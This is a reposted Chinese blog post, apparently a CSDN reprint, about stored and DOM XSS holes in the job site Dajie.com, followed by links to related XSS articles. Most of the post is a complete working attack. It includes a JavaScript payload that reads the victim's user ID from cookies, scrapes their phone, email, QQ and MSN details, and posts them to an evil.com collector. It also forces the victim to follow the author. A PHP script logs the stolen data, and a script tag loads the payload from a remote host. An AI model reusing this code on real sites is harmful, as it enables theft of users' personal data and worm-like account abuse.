大街网反弹and存储型XSS漏洞及测试Payload

最新推荐文章于 2024-01-21 08:00:00 发布
最新推荐文章于 2024-01-21 08:00:00 发布
阅读量172 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/pnigos/articles/2503198.html
版权

Author:Pnig0s

Freebuf.com首发,转载请注明出处。

前几个月去大街网上找实习,目前算是企业校招最权威的一个网站了,简单测试了下,储存型和反弹型XSS应有尽有。

联系人查找处DOM XSS

短信息处储存XSS:前面加一些无用内容,否则会在收信箱的预览中看到js脚本的内容

 

 

 

完全没有过滤。另外个人简历和个人名片处也有存储型XSS。

然后访问个人主页:

通过这些XSS点,收集一些未公开用户的个人信息简历信息就比较容易了。

自己写了一个简单的XSS Payload,可以收集用户联系信息发送到远程,自动关注本人,通过Cookie避免二次污染。几个功能都在同域,加个自动发短消息的功能就变成了一个简单的蠕虫了,只发了Payload部分,使用了较新的DOM方法getElementsByClassName,初涉XSS,大牛飘过,欢迎吐槽。

XSS Payload:

var c_name = "uchome_loginuser" //cookie中存放用户ID的字段
var c_userid = "" //用户ID
var cus_url = "http://www.dajie.com/profile/mine" //个人信息界面
var tel = "" //记录电话
var email = "" //记录邮件
var qq = "" //记录QQ
var msn = "" //记录MSN</code>

function getCookieValue(c_name){
if(document.cookie.length>0) //返回Cookie指定字段
{
c_start = document.cookie.indexOf(c_name + "=")
if(c_start != -1)
{
c_start = c_start + c_name.length+1;
c_end = document.cookie.indexOf(";",c_start)
if(c_end == -1) c_end = document.cookie.length
c_userid = unescape(document.cookie.substring(c_start,c_end))
return c_userid
}
return ""
}
}

function setCookieValue(c_name,value) //添加Cookie指定值
{
document.cookie = c_name+"="+escape(value)
}

var ajaxGet = null
function getUrl(url_addr){ //通过Ajax请求GET页面内容(同域)
if(window.XMLHttpRequest)
{
ajaxGet = new XMLHttpRequest();
}else if(window.ActiveXObject)
{
ajaxGet = new ActiveXObject("Microsoft.XMLHTTP");
}else
{
return ""
}
ajaxGet.open("GET",url_addr,true)
ajaxGet.setRequestHeader("Content-Type","text/xml")
ajaxGet.send(null);

}

var ajaxPost = null
function postUrl(post_url,cusKey,cusValue) //通过Ajax请求POST到远程
{
var postStr = cusKey+"="+cusValue
if(window.XMLHttpRequest){
ajaxPost = new XMLHttpRequest();
}else if(window.ActiveXObject)
{
ajaxPost = new ActiveXObject("Microsoft.XMLHTTP");
}else
{
return ""
}
ajaxPost.open("POST",post_url,true)
//ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded")
ajaxPost.send(postStr)
}

function getPersonalInfo(responContent) //提取用户个人信息
{
var cusNode = document.createElement("div")
cusNode.innerHTML = responContent
document.body.appendChild(cusNode)
var preInfo = document.getElementsByClassName("tl-contact-item tel")
var realInfo = preInfo[0].getElementsByTagName("i")
tel = realInfo[0].getAttribute("title")
var preInfo = document.getElementsByClassName("tl-contact-item qq")
var realInfo = preInfo[0].getElementsByTagName("i")
qq = realInfo[0].getAttribute("title")
var preInfo = document.getElementsByClassName("tl-contact-item msn")
var realInfo = preInfo[0].getElementsByTagName("i")
msn = realInfo[0].getAttribute("title")
var preInfo = document.getElementsByClassName("tl-contact-item email")
var realInfo = preInfo[0].getElementsByTagName("i")
email = realInfo[0].getAttribute("title")
}

c_userid = getCookieValue(c_name) //从Cookie中获取用户ID
var icard_url = "http://www.dajie.com/profile/"+c_userid+"/icard" //构造个人名片Url

function FollowMe() //自动关注指定用户
{
var img = document.createElement("img")
img.src="http://www.dajie.com/card/exchange/api/invite?cardUid=xxxxxx&ajax=1"
document.body.appendChild(img)
}

if(document.cookie.indexOf("xssed") == -1)//判断是否已经污染
{
var content = ""
getUrl(cus_url) //获取要获取页面的内容
ajaxGet.onreadystatechange = function()
{
if(ajaxGet.readyState == 4 && ajaxGet.status == 200)
{
content = ajaxGet.responseText
getPersonalInfo(content)
var cusForm = document.createElement("div");
document.body.appendChild(cusForm)
cusForm.innerHTML = '<form id="xssform" action="http://www.evil.com/xsstest.php" method="post" name="mbform">'+'<input type="text" name="tel" value="+escape(tel)+" />'+'<input type="text" name="email" value="+escape(email)+" />'+'<input type="text" name="qq" value="+escape(qq)+" />'+'<input type="text" name="msn" value="+escape(msn)+" />'+'</form>'
document.getElementById("xssform").submit(); } }
FollowMe() }
setCookieValue("xssed",true) //设置Cookie避免多次污染

  

远程接收信息的xsstest.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$tel = $_POST[tel];
$qq = $_POST[qq];
$msn = $_POST[msn];
$email = $_POST[email];

$time = date("Y-m-d G:i:s A");

$file = fopen($ip.'.txt','a');
fwrite($file,"Tel:".$tel."\nQQ:".$qq."\nMSN:".$msn."\nEmail:".$email);
fclose($file);
header("Location: ".$referer);//?>

 

最后短消息中嵌入<script src=http://www.xss.com/xsstest.js></script>

转载于:https://www.cnblogs.com/pnigos/articles/2503198.html

diedou2773
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
XSS漏洞
bobi1024的博客
10-24 4539
XSS漏洞一.反射XSS攻击流程DOMXSS二.储存XSS攻击流程![储存XSS](https://img-blog.csdnimg.cn/4ef92ba721d64a80ad436afb3304c30c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYm9iaTEwMjQ=,size_19,color_FFFFFF,t_70,g_se,x_16)BlindXSS三.反射
Go-XSShell是一个XSS反向shell框架
08-14
XSShell是一个跨站点脚本的反向shell ...好吧,也许它不是一个真正的反向shell,但它允许你与XSS受害者的浏览器实时交互。
XSS漏洞:利用多次提交技巧实现存储XSS攻击
最新发布
qq_68163788的博客
01-21 2313
存储XSS(Cross-Site Scripting)是一种Web应用程序安全漏洞,攻击者通过在受害者的浏览器上执行恶意脚本,从而获取用户的敏感信息。存储XSS攻击的主要原理是将恶意脚本存储在服务器端,然后当用户访问包含该恶意脚本的页面时,恶意脚本会被执行。 攻击者通常会在受害者能够输入内容的地方(例如论坛、博客评论、搜索框等)注入恶意脚本。当其他用户访问包含恶意脚本的页面时,他们的浏览器会执行这些脚本,从而导致攻击者能够窃取用户的会话令牌、cookie或其他敏感信息。
存储XSS灰盒测试-01
09-15
存储XSS灰盒测试-01 存储XSS是一种常见的Web应用安全漏洞,它允许攻击者将恶意脚本存储在服务器上,然后在其他用户访问时触发恶意脚本,从而实现攻击。存储XSS的危害性非常高,因此需要进行严格的检测和防护...
DedeCMS 存储xss漏洞1
08-03
【DedeCMS 存储 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建站。然而,如同任何软件一样,DedeCMS 也存在安全...
ourphp 站内信存储xss漏洞1
08-04
存储XSS漏洞是指攻击者将恶意代码存储在服务器上,而不是反射到用户浏览器上,这使得攻击者可以在服务器上存储恶意代码,以便日后攻击其他用户。在OurPHP 1.7.1版本中,站内信存储XSS漏洞就存在于站内信模块中。...
web漏洞XSS_TEST漏洞实践练习代码
04-25
XSS分为三种类存储XSS、反射XSS和DOMXSS。 1. 存储XSS:攻击者将恶意脚本存储在目标站的数据库中,当其他用户访问该页面时,脚本会被执行。这种类XSS危害较大,因为攻击持续时间长,影响范围广。...
xss平台搭建源码,xss漏洞练习
06-03
XSS分为反射XSS存储XSS和DOMXSS三种类。反射XSS是通过诱使用户点击含有恶意脚本的链接来触发;存储XSS则是恶意脚本被存储在服务器端,然后在用户查看页面时执行;DOMXSS则是在客户端通过修改DOM对象...
笔记:XSS浅析
04-13 1962
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言利用绕过 前言 XSS分类 反射:非持久性,需要用户点击 存储:持久性,代码存储在服务器,访问页面就可进行攻击 dom(反射):客户端脚本自身的解析不对导致的安全问题 利用 1.窃取COOLIE 2.恶意跳转 3.页挂马/权限提升 4.通过msf生成木马url,调用反弹连解payload,设置监听ip,将木马url通过存储XSS存储到服务器上,未打补丁访问者被攻击 绕过 1.无过滤 "><scrip.
xss攻击突破转义_XSS 跨站脚本攻击总结
weixin_39881802的博客
11-21 574
漏洞起因可以输入的地方没有做好对应的过滤,引发的xss攻击漏洞危害盗取cookie劫持用户浏览器钓鱼攻击挂马在一定的条件下可以getshell会话劫持漏洞反射XSS(危险级别:低),插入的语句停留在当前页面。DOMXSS (危险级别:中), DOMxss又分为两种 (a.可见、b.不可见),插入的语句影响js 。存储XSS(危险级别:高),插入的语句保存在数据库 。其他XSS(例...
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5429
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射XSS3.2、存储XSS3.3、DOMXSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
88.络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
qwsn
01-25 4084
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试-加载payload的方法 1、背景 2、xss平台通用payload加载 3、img 创建script标签加载 4、字符并接加载 5、jquery加载
XSS Challenges闯关1-6
linxaiomo
04-07 1025
第一关: 靶场链接:XSS Challenges (by yamagata21) - Stage #1 第一关截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert(document.doman)完成,我们优先考虑xss的常规操作,直接用script标签完成alert弹出。 Hint: very simple... 看到图中的搜索框,输入弹窗xss <script>alert(document.domain)</script&g..
XSS漏洞分类
qq_39654116的博客
01-17 792
目录反射XSS储存XSS反射XSS存储XSS的区别DOM XSS可能触发DOMxss的属性DOM例子Blind XSS 反射XSS 反射XSS是比较常见和广泛的一类,举例来说,当一个站的代码中包含类似下面的语句:<?php echo "<p>hello, $_GET['user']</p>";?> ,那么在访问时设置 /?user=</p><script>alert("hack")</script><p>
Web安全之XSS漏洞详解
hack0919的博客
04-17 1547
常见的XSS漏洞危害有:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等
搭建XSS平台——XSS工具的利用
cxrpty的博客
02-24 2405
实验一:kali下的BeEF 实验环境:kali、DVWA 实验步骤: 1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef) 2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下: <script src="http://192.168.1.106:3000/hook....
从零开始搭建轻量级个人XSS平台
热门推荐
爱测未来团队博客
08-28 4万+
想深入学习一下XSS相关知识的,快看这里。
xss漏洞手工构造payload
07-28
- *1* *2* *3* [反射XSS存储XSS和DOMXSS的简介及XSS常见payload构造及变形](https://blog.csdn.net/bwxzdjn/article/details/123645177)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值